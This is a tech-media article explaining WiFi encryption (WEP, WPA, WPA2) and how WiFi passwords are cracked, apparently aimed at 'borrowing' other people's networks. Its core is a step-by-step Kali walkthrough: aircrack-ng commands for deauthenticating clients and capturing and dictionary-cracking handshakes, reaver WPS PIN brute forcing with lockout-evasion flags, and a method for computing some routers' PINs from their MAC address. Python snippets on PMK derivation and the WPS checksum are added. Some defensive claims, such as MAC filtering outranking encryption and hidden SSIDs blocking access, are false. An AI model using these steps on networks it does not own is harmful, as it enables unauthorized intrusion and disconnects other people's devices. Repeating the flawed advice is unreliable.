Detailed Explanation of Wireless WiFi Password Cracking Techniques and Principles

Everyone has probably experienced that feeling when the WiFi in their home seems to be slowing down, wondering, “Is someone using my WiFi?” Sometimes, when we go out, we also want to try to use someone else’s WiFi. The premise of “borrowing WiFi” is to crack the other party’s “wireless password”. So, how secure is this “wireless password”? What are the technical principles behind it? And how can we prevent others from “borrowing” our WiFi?


Today, we will sort out the “password cracking techniques and principles of wireless WiFi networks” in this article!

1. WiFi Encryption Methods

This section explains the WiFi encryption methods used in wireless routers.

Currently, the encryption modes available in wireless routers mainly include: WEP, WPA-PSK(TKIP), WPA2-PSK(AES), and WPA-PSK(TKIP) + WPA2-PSK(AES).

1. WEP (Wired Equivalent Privacy) (Easily Cracked)

WEP is short for Wired Equivalent Privacy, a security protocol for wireless local area networks (WLAN) defined in the 802.11b standard. WEP is meant to provide a level of security equivalent to that of a wired LAN. A wired LAN is inherently better protected than a WLAN because its physical structure protects it: part or all of the network is buried inside buildings, which prevents unauthorized access. A WLAN transmits over radio waves, lacks that physical protection, and is therefore more vulnerable to attack and interference. WEP’s goal is to provide security by encrypting the data carried on the radio waves, similar to end-to-end encryption. WEP uses the RC4 stream cipher (a PRNG-based algorithm) developed by RSA Data Security. If your wireless base station supports MAC filtering, it is recommended to use that feature together with WEP (MAC filtering is much more secure than encryption). Despite a name that suggests a security option for wired networks, WEP is nothing of the kind.

The WEP standard was created in the early days of wireless networking to serve as a necessary layer of security for WLANs, but its record has been disappointing. The root cause lies in design flaws. In systems using WEP, the data transmitted over the wireless network is encrypted with a randomly generated key. However, the method WEP uses to generate these keys was quickly found to be predictable, making it easy for intruders to intercept and crack them. Even a moderately skilled wireless attacker can crack WEP encryption in two to three minutes.

The dynamic WEP mode of IEEE 802.11 was designed in the late 1990s, when strong encryption technology was subject to strict U.S. export restrictions, so wireless products using stronger algorithms could not be exported. Just two years later, serious flaws were discovered in the dynamic WEP mode. The mistakes of the 1990s should not be blamed on wireless network security or on the IEEE 802.11 standard itself; the wireless industry could not wait for the IEEE to revise the standard, so it introduced TKIP (Temporal Key Integrity Protocol), a patched version of dynamic WEP.

Although WEP has been proven outdated and ineffective, it is still supported as an encryption mode in many modern wireless access points and routers today. Moreover, it remains one of the most commonly used encryption methods by individuals or companies. If you are using WEP encryption and care about the security of your network, it is advisable to stop using WEP as soon as possible, as it is not secure.

2. WPA-PSK (TKIP) (Higher Security, but Can Also Be Cracked)

The initial security mechanism adopted by wireless networks was WEP (Wired Equivalent Privacy), but it was later found to be insecure. The IEEE 802.11 working group began work on a new security standard, which later became the 802.11i protocol. However, standardization took a long time, and since consumers would not abandon their existing wireless devices for the sake of network security, the Wi-Fi Alliance developed a security mechanism called WPA (Wi-Fi Protected Access) based on the 802.11i draft before the standard was released. WPA uses TKIP (Temporal Key Integrity Protocol), which employs the same encryption algorithm (RC4) as WEP, so the hardware of existing wireless devices did not need to change. WPA addresses the problems in WEP (short IV, overly simple key management, and lack of effective message integrity protection) and thus improves network security through a software upgrade.

WPA provides users with a complete authentication mechanism: the AP decides whether to allow a user onto the wireless network based on the authentication result, and once a user is authenticated it can dynamically change that user’s encryption keys based on various factors (such as the number of data packets transmitted or how long the user has been connected). In addition, it protects the data packets users transmit with a message integrity code (MIC), ensuring that user data cannot be altered by other users. As a subset of the 802.11i standard, WPA’s core consists of IEEE 802.1X and TKIP.

WPA considers the security needs of different users and applications. For example, enterprise users require high levels of security protection (enterprise-level), as they may leak very important business secrets; while home users often use the network just for browsing the Internet, sending and receiving emails, printing, and sharing files, which have relatively lower security requirements. To meet the needs of users with different security requirements, WPA specifies two application modes: enterprise mode and home mode (including small offices). Based on these two different application modes, WPA’s authentication also has two different methods.

For large enterprises, the “802.1x + EAP” method is commonly used, where users provide credentials for authentication. However, for small and medium-sized enterprise networks or home users, WPA also provides a simplified mode that does not require a dedicated authentication server. This mode is called “WPA Pre-Shared Key (WPA-PSK)”, which only requires entering a key in advance on each WLAN node (AP, wireless router, network card, etc.) to achieve authentication. This key is only used for the authentication process and not for data transmission encryption. The data encryption key is generated dynamically after successful authentication, ensuring that “one household has one key”, avoiding the situation where a single encryption key is shared across the entire network, thus greatly enhancing system security.

3. WPA2-PSK (AES) (Higher Security, Increased Cracking Difficulty)

After 802.11i was issued, the Wi-Fi Alliance launched WPA2, which supports AES (Advanced Encryption Standard), requires new hardware support, and uses CCMP (Counter Mode with Cipher Block Chaining Message Authentication Code Protocol). In WPA/WPA2, the PTK is derived from the PMK, which can be obtained in two ways: either in the form of a PSK, in which case PMK = PSK, or through negotiation between the station and an authentication server, which produces the PMK.

IEEE 802.11 establishes technical standards, while the Wi-Fi Alliance sets commercialization standards, which generally comply with the technical standards set by IEEE. WPA (Wi-Fi Protected Access) is a security standard formulated by the Wi-Fi Alliance, aimed at supporting the IEEE 802.11i technical security standard. WPA2 is essentially the second version of WPA. The reason for having two versions of WPA is due to the commercialization operations of the Wi-Fi Alliance.

We know that the purpose of the IEEE 802.11 task force is to create a more secure wireless local area network. Therefore, in the encryption project, two new security encryption protocols were specified: TKIP and CCMP (some wireless network devices may refer to CCMP as AES or AES-CCMP). While TKIP made significant improvements addressing the weaknesses of WEP, it retained the RC4 algorithm and basic architecture, implying that TKIP also inherits the weaknesses inherent in RC4. Therefore, IEEE 802.11 created a completely new, stronger, and more suitable encryption protocol for wireless LAN environments: CCMP. However, before CCMP was ready, TKIP was already completed. To expedite the deployment of the new security standard and alleviate users’ concerns regarding wireless network security, thus allowing the wireless LAN market to expand rapidly, the Wi-Fi Alliance based WPA on the completed TKIP and the draft 3 of IEEE 802.11i. Once the IEEE completed and published the IEEE 802.11i wireless LAN security standard, the Wi-Fi Alliance promptly released WPA version 2 (WPA2). WPA = IEEE 802.11i draft 3 = IEEE 802.1X/EAP + WEP (optional) / TKIP; WPA2 = IEEE 802.11i = IEEE 802.1X/EAP + WEP (optional) / TKIP/CCMP.

4. WPA-PSK (TKIP) + WPA2-PSK (AES) (Mixed Mode)

This is currently the highest encryption mode offered by wireless routers. The most widely used modes are WPA-PSK (TKIP) and WPA2-PSK (AES); the mixed mode, although highly secure, has not been widely adopted because of compatibility issues. A wireless network secured with encryption is what lets users go online with peace of mind.

2. Methods for Cracking WiFi Network Passwords

1. Main Methods:

  • Non-technical methods, such as using apps like “WiFi Master Key” to borrow WiFi.

  • Capturing the handshake packets between a client and the target WiFi, then running a dictionary-based brute-force crack; the success rate depends on the target WiFi’s password strength, the size and accuracy of the dictionary, and the computational power of the cracking machine.

  • For WiFi with WPS enabled, guessing the WPS PIN to obtain the WiFi password.

2. Principles:

The real principle behind “WiFi Master Key”-style apps is to collect the WiFi names and passwords of networks that users’ phones have successfully connected to and upload them to the app’s server. When another user nearby searches for the same network, the app matches the configuration information of nearby hotspots against the server, fetches the corresponding password over mobile data, and sends it to the phone, completing the WiFi connection.

(1) Brute-force Cracking Principles

Ordinary wireless routers generally use WPA, WPA2, or WEP encryption. WEP is so insecure and so easily cracked that it has essentially disappeared from current routers, so the WiFi networks we find to crack are mostly WPA or WPA2 encrypted. WPA with an authentication server (such as RADIUS) is generally not used in personal WiFi scenarios, so the networks we can find to crack are mostly WPA or WPA2 networks based on a local pre-shared password.

The basic principle of cracking WPA- and WPA2-encrypted WiFi networks is as follows. With the wireless card in monitor mode, we first collect information about the target WiFi: the SSID (WiFi name), the BSSID (the MAC address of the target router), the MACs of connected clients, signal strength, and so on. We then send forged de-authentication packets to force a connected client off the network. The key point is that the disconnected client will try to reconnect, and the reconnection exchange (commonly called the handshake packet) carries authentication material derived from the WiFi password. Our attacking machine uses the attack program and the wireless card to capture this handshake. The handshake does not contain the password in readable form, so the attack program takes each password in a dictionary, runs the WPA computation with it together with the captured BSSID and client MAC information, and compares the result with the values in the handshake; a password that produces a match is the target WiFi password. If none of the passwords in the dictionary match after all have been tried, the crack fails, and we exit and build a new dictionary to try again.
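As an added example (not code from the original article), the following Python shows what the “encrypted password” in the handshake actually is: the WPA/WPA2-PSK passphrase is stretched into the Pairwise Master Key (PMK) with PBKDF2-HMAC-SHA1 over the SSID, which fixes the cost of every dictionary guess and also quantifies the password advice in section 4. The “HomeWiFi” SSID and the 8-digit versus 12-character comparison are constructed; the “password”/“IEEE” value is the published IEEE 802.11i test vector.

```python
import hashlib
import hmac
import time

# IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
PBKDF2_ITERATIONS = 4096
PMK_LENGTH = 32


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK (which is the PSK in personal mode) for an 8..63 character passphrase.

    The SSID is the salt: the same passphrase on a different SSID gives a
    different PMK, so a table precomputed for one SSID is useless for another.
    """
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8 to 63 characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), PBKDF2_ITERATIONS, PMK_LENGTH)


def pmk_matches(candidate: str, ssid: str, known_pmk: bytes) -> bool:
    """Constant-time check of whether a candidate passphrase yields known_pmk.
    This single derivation is the unit of work a dictionary attack pays per guess."""
    return hmac.compare_digest(derive_pmk(candidate, ssid), known_pmk)


def measure_guess_rate(ssid: str = "TestSSID", samples: int = 20) -> float:
    """Derivations per second on one CPU core with plain hashlib.
    GPU crackers are several orders of magnitude faster; the ratios below still hold."""
    start = time.perf_counter()
    for i in range(samples):
        derive_pmk(f"sample-pass-{i:04d}", ssid)
    return samples / (time.perf_counter() - start)


def keyspace(length: int, alphabet_size: int) -> int:
    """Number of distinct passphrases of a given length over an alphabet."""
    return alphabet_size ** length


def years_to_exhaust(space: int, guesses_per_second: float) -> float:
    """Worst-case time to try every passphrase in the space, in years."""
    return space / guesses_per_second / (365 * 24 * 3600)


if __name__ == "__main__":
    # Published IEEE 802.11i test vector: passphrase "password", SSID "IEEE"
    # gives f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e.
    print("PMK(password, IEEE)    :", derive_pmk("password", "IEEE").hex())
    # Constructed SSID to show the salting effect of the network name.
    print("PMK(password, HomeWiFi):", derive_pmk("password", "HomeWiFi").hex())

    rate = measure_guess_rate()
    print(f"~{rate:,.0f} PBKDF2 derivations per second on this core")
    # Constructed comparison: an 8-digit numeric key versus the 12-character
    # mix of letters, digits and symbols (~95 printable ASCII) advised in section 4.
    for label, length, alphabet in (("8 digits", 8, 10), ("12 mixed chars", 12, 95)):
        space = keyspace(length, alphabet)
        print(f"{label:15s}: {space:.2e} candidates, "
              f"{years_to_exhaust(space, rate):.3g} years to exhaust")
```

Run it once to see that an 8-digit numeric key falls within hours even on a single core, while the 12-character mixed key is out of reach by many orders of magnitude.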

(2) PIN Code Cracking WiFi Passwords

Early wireless routers shipped with WPS enabled. The function was designed so that devices could join the WiFi without repeatedly entering a password: the router holds an 8-digit purely numeric PIN, and a client that presents this PIN is quickly associated with the router’s WiFi. The original intention of WPS was to make connecting easier, but it has become one of the most effective means of cracking WiFi, because an 8-digit numeric PIN has at most 100 million combinations and the design shrinks that number drastically. The last digit is a checksum of the first seven, so only seven digits need to be guessed, leaving 10 million combinations. Furthermore, the error response for a wrong first half (the first four digits) differs from that for a wrong second half (the next three digits), so the first four digits can be guessed on their own and then the remaining three; once both halves are correct, the checksum digit is simply computed. In theory, therefore, at most 10,000 + 1,000 attempts are needed. At one PIN attempt every two seconds, the target router’s PIN can be recovered in at most about 6 hours.

It should be noted that although PIN cracking is considered the most effective WiFi cracking method, it is not easy to carry out in practice. First, the insecurity of the WPS PIN is now widely recognized by router manufacturers, so most routers sold today ship with WPS disabled. Second, guessing the PIN requires sending PIN attempts to the target router one after another and receiving its response packets. Because of instability or limited performance, the router may stop responding, halting the guessing, or it may lock WPS for a period after receiving too many incorrect PINs, stretching the process until it is no longer worthwhile.
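As an added example (not from the original article), the following Python implements the WPS PIN checksum from the Wi-Fi Simple Configuration specification and works through the search-space and timing figures in the two paragraphs above; it also models the lockout behaviour just described. The lockout policy used at the end (WPS locked for 300 seconds after every three failures) is a constructed assumption based on the 300-second restriction mentioned later in the article.

```python
# Wi-Fi Simple Configuration PIN format: seven free digits plus one checksum
# digit computed with alternating weights 3,1,3,1,3,1,3.
WEIGHTS = (3, 1, 3, 1, 3, 1, 3)


def wps_checksum(first_seven: str) -> int:
    """Eighth PIN digit: the value that makes the weighted digit sum a multiple of 10."""
    if len(first_seven) != 7 or not first_seven.isdigit():
        raise ValueError("expected exactly 7 decimal digits")
    total = sum(w * int(d) for w, d in zip(WEIGHTS, first_seven))
    return (10 - total % 10) % 10


def is_valid_wps_pin(pin: str) -> bool:
    """True if pin is 8 digits and its last digit is the correct checksum."""
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(pin[:7])


def search_space(checksum_known: bool, halves_verified_separately: bool) -> int:
    """Worst-case number of PIN attempts under the assumptions discussed above."""
    if not checksum_known:
        return 10 ** 8            # all eight digits unknown
    if not halves_verified_separately:
        return 10 ** 7            # guess seven digits, compute the eighth
    return 10 ** 4 + 10 ** 3      # first four digits, then the next three


def worst_case_seconds(attempts: int, seconds_per_attempt: float = 2.0,
                       lockout_after: int = 0, lockout_seconds: float = 0.0) -> float:
    """Time to exhaust `attempts`. If the AP locks WPS for lockout_seconds after
    every lockout_after consecutive failures, each lockout is added to the total."""
    total = attempts * seconds_per_attempt
    if lockout_after > 0:
        total += ((attempts - 1) // lockout_after) * lockout_seconds
    return total


if __name__ == "__main__":
    print("12345670 valid PIN?   ", is_valid_wps_pin("12345670"))  # True
    print("12345678 valid PIN?   ", is_valid_wps_pin("12345678"))  # False: bad checksum
    for known, split in ((False, False), (True, False), (True, True)):
        print(f"checksum_known={known!s:5} split_verify={split!s:5}: "
              f"{search_space(known, split):>11,} attempts")
    n = search_space(True, True)                          # 11,000
    print(f"no lockout        : {worst_case_seconds(n) / 3600:.1f} hours")  # 6.1
    # Constructed lockout policy: WPS locked for 300 s after every 3 failures.
    print(f"300 s lockout per 3: {worst_case_seconds(n, 2.0, 3, 300.0) / 86400:.1f} days")
```

The last two lines are the defender’s takeaway: the same 11,000 attempts go from about six hours to roughly two weeks under a modest lockout, and to zero if WPS is simply disabled.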

3. Example of the Cracking Process

1. Preparation Tools

  • Laptop

  • USB Wireless Network Card (Essential)

  • Kali System

  • Password Dictionary

2. First Method: Brute-force Cracking

What is brute-force cracking? It is actually trying one password at a time until the correct password is found.

Currently, WiFi encryption generally includes:

WEP (Wired Equivalent Privacy) — Uses WEP 64-bit or 128-bit data encryption.

WPA-PSK [TKIP] — Uses pre-shared key Wi-Fi Protected Access, employing WPA-PSK standard encryption technology with TKIP as the encryption type.

WPA-PSK [TKIP] + WPA2-PSK [AES] — Allows clients to use either WPA-PSK [TKIP] or WPA2-PSK [AES].

3. Start the Experiment:

(1) First Step

Enter Kali and input the following command in the terminal:

airmon-ng

This lists the wireless network interfaces.


(2) Second Step

Input:

airmon-ng start wlan0

Start the network card in monitor mode


You can use the ifconfig command to check the network card information:

ifconfig

You can see that the name of the network card has changed (to wlan0mon).


(3) Third Step

airodump-ng wlan0mon

Scan for WiFi signals


Here, I am testing with my home WiFi

(4) Fourth Step

As shown in the scan output above, the BSSID is 50:3A:A0:33:B2:8C and the channel (CH) is 2.

Input:

airodump-ng -w freedom -c 2 --bssid 50:3A:A0:33:B2:8C wlan0mon --ignore-negative-one

Capture the handshake packet

-c: Specify the channel

-w: Specify the file name prefix for the captured handshake; here freedom, so the capture files are written as freedom-*.cap

--bssid: Specify the router’s MAC


(5) Fifth Step

Open another terminal and input the command:

aireplay-ng --deauth 10 -a routerMAC -c clientMAC wlan0mon --ignore-negative-one

Use the aireplay-ng tool to forcibly disconnect devices already connected to the WiFi to capture data packets

--deauth: Specify the number of de-authentication packets to send; -0 (the digit zero) is the short form of the same option

-a: Specify the router’s MAC

-c: Specify the client’s MAC


(6) Sixth Step

Crack the handshake packet


aircrack-ng -a2 -w dict freedom-*.cap

  • -a: Attack mode; -a1 for WEP, -a2 for WPA/WPA2-PSK (the target here is WPA2-PSK, so -a2)

  • -w dict: Name of the dictionary file

  • freedom-*.cap: The capture file(s) containing the handshake


This is my WiFi password


Cracking completed; success depends on a powerful dictionary and luck.

4. Second Method

(1) First Step

Scan for networks with WPS enabled using wash (the optional -C flag ignores frames with bad FCS checksums):

wash -i wlan0mon [-C]


If wash shows no nearby WiFi networks with WPS enabled, do not panic, as some may simply not advertise it. We can fall back on the earlier command to scan for WiFi:

airodump-ng wlan0mon


Look for the MAC circled in the screenshot; choose a WiFi whose PWR value is closer to zero than -70 (e.g. -45), i.e. a strong enough signal, to crack.

(2) Second Step

Select a router

I chose the WiFi named: FAST_F70E

That is this row of the airodump-ng output (columns: BSSID, PWR, Beacons, #Data, #/s, CH, MB, ENC, CIPHER, AUTH, ESSID):

E4:D3:32:7F:F7:0E  -45  2  0  0  6  54e.  WPA2  CCMP  PSK  FAST_F70E

Then the command is as follows:

reaver -i wlan0mon -b E4:D3:32:7F:F7:0E -a -S -vv

E4:D3:32:7F:F7:0E is the router’s MAC; replace it with the MAC of the router you selected.


If the reaver output (shown in the screenshot above) indicates that cracking can proceed, WPS is enabled.


If the output shows that it cannot be cracked, try another WiFi.


Output like that in the screenshot indicates that the PIN has been cracked.

Notes:

If the WiFi password has been changed but you know the router’s WPS PIN, use the following command: reaver -i wlan0mon -b MAC -p PIN

The PIN has 8 digits, so a naive search would require 10^8 attempts, i.e. 100 million tries.

However, there are limitations. For the PIN to be cracked at all, the router must have WPS enabled; many routers now ship with WPS disabled or lock WPS for 300 seconds after a number of failed PIN attempts.

Some routers’ PINs can be calculated: for Tenda and Leike products whose MAC address starts with “C83A35” or “00B00C”, the PIN value can be derived directly.

For example: BSSID Tenda_579A18, MAC C8:3A:35:57:9A:18. Converting the last 6 hex digits of the MAC (579A18) to decimal gives 5741080, which are the first 7 digits of the PIN; the full PIN can then be obtained with at most 10 attempts (one per possible final digit) or with software.

When cracking, it is recommended to use this command:

reaver -i wlan0mon -b E4:D3:32:7F:F7:0E -a -S -d9 -t9 -vv

The -d9 (delay between PIN attempts) and -t9 (receive timeout) parameters slow the attack down, which makes the router less likely to lock WPS.

4. How to Prevent WiFi Theft

(1) Set a complex password of at least 12 characters that mixes letters, symbols, and numbers. The more complex the wireless password, the harder it is for others to crack. Choose the WPA-PSK/WPA2-PSK encryption methods.


(2) Hide your wireless network name.

When we hide the wireless network name, others cannot find our access point and so cannot connect to our network. Click Wireless Basic Settings in the upper left of the router page; on the right you will see an option for SSID broadcast. Uncheck the box in front of it and click Save below to hide the wireless signal.


(3) Set up a whitelist and enable MAC address filtering, manually adding the MAC addresses of your home internet-enabled devices. This way, even if someone cracks the WiFi password, they cannot access the internet.


Source: 51CTO Media
